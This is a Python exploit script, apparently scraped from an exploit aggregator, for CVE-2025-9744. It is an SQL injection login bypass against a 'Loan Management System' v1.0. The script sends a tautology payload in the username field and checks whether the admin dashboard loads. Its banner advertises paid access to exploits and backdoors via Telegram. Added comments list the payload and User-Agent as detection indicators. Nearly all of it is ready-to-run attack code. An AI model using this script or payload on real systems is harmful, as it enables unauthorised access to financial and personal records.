## https://sploitus.com/exploit?id=PACKETSTORM:210713
# -*- coding: utf-8 -*-
    # Exploit [Loan Management System] v1.0 - SQL Injection
    # Google Dork: N/A
    # Date: 20/10/2025
    # Exploit Author: CodeB0ss
    # Vendor: Loan Management System
    # Software Link: https://www.loanpro.io/
    # Version: <= 1.0.0
    # Tested on: Windows
    # CVE : CVE-2025-9744
    # CVSS Score : 10
    
    from __future__ import print_function

    import sys

    import requests
    
    # Banner text printed by main() before any request is sent. Everything
    # between the triple quotes (including blank lines and the author's
    # promotional text) is emitted verbatim by print(banner).
    banner = '''
    
    -#-
    bY t.me/uncodeboss
    
    CVE-2025-9744 => [Loan Management System] v1.0 - SQL Injection
    
    [Notification] : Become a VP user and get all the exploits and tools,
    backdoors
    t.me/realcodeb0ss . 35% Discount Prefer Code : 9QzkLw
    
    [Usage] :
    python CVE-2025-9744.py -u http/https or just example.com.
    
    '''
    
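    # Silence urllib3's InsecureRequestWarning: every request below is made
    # with verify=False, i.e. TLS certificate validation is switched off, so
    # the warning would otherwise be printed for each call. Only the failures
    # this lookup can actually produce are tolerated; the original bare
    # `except:` also swallowed KeyboardInterrupt and SystemExit.
    try:
        requests.packages.urllib3.disable_warnings()
    except (AttributeError, ImportError):
        pass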
    
    def codeb0ssexp(codeb0ss_base):
        """Probe one host for the CVE-2025-9744 login SQL injection.

        Normalises *codeb0ss_base* to an ``http(s)://`` origin, POSTs the
        tautology payload to ``/ajax.php?action=login`` and then fetches
        ``/index.php?page=home`` in the same session. The host is reported
        as vulnerable only when the concatenated login and home responses
        contain all of the dashboard markers and the ``login-form`` marker.

        Returns 0 (markers found), 2 (markers absent) or 1 for any
        ``requests`` transport error, which is printed as ``Time0ut``
        whatever its actual cause.

        Notes for defenders: the POST body carries the URL-encoded
        ``' or '1'='1'#`` pattern in the ``username`` field, and the client
        announces itself with a ``Mozilla/5.0 (https://t.me/realcodeb0ss)``
        User-Agent; both are usable WAF / log-search indicators. TLS
        verification is disabled (``verify=False``), so the scan traffic
        itself is open to interception.
        """
        target = codeb0ss_base
        if not (target.startswith("http://") or target.startswith("https://")):
            target = "http://" + target
        base_url = target.rstrip("/")

        session = requests.Session()
        session.headers.update({
            'User-Agent': 'Mozilla/5.0 (https://t.me/realcodeb0ss) Gecko/20100101 Firefox/113.0',
            'Content-Type': 'application/x-www-form-urlencoded',
        })
        red, green = "\033[91m", "\033[92m"

        post_url = base_url + "/ajax.php?action=login"
        get_url = base_url + "/index.php?page=home"
        # The injection point is the username field; the password is arbitrary.
        username = "admin'+or+'1'%3D'1'%23"
        password = "expbycodeb0ss"
        payload = "username={}&password={}".format(username, password)

        try:
            r_post = session.post(post_url, data=payload, timeout=10, verify=False)
            r_get = session.get(get_url, timeout=10, verify=False)
            try:
                combined = (r_post.text or "") + (r_get.text or "")
            except Exception:
                # Original fallback: mixes bytes and str and may itself raise.
                combined = (r_post.content or "") + (r_get.content or "")
            markers = ["window.start_load", "Welcome back Admin", "Loan Management System"]
            hit = all(m in combined for m in markers) and "login-form" in combined
        except requests.exceptions.RequestException:
            # Any transport failure (not only timeouts) lands here.
            print(" - " + base_url + " --> " + red + "Time0ut")
            return 1

        if hit:
            print(" - " + base_url + " --> " + green + "Vulnerable")
            print(" - {}".format(post_url))
            print(" - {}".format(get_url))
            return 0
        print(" - " + base_url + " --> " + red + "Not_Vulnerable")
        return 2
    def startexp():
        """Return the argument following the first ``-u`` in sys.argv.

        Returns None when ``-u`` is absent or is the last argument.
        """
        args = sys.argv
        try:
            pos = args.index('-u')
        except ValueError:
            return None
        return args[pos + 1] if pos + 1 < len(args) else None
    def main():
        """CLI entry point: print the banner, read ``-u``, run the probe and exit with its code."""
        print(banner)
        host = startexp()
        if not host:
            # No -u value given; usage is already shown in the banner. Exit 1 without probing.
            sys.exit(1)
        sys.exit(codeb0ssexp(host))
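    # Run the probe only when executed directly, not on import. The guard must
    # compare the dunder ``__name__``; a bare ``name`` would raise NameError.
    if __name__ == "__main__":
        main()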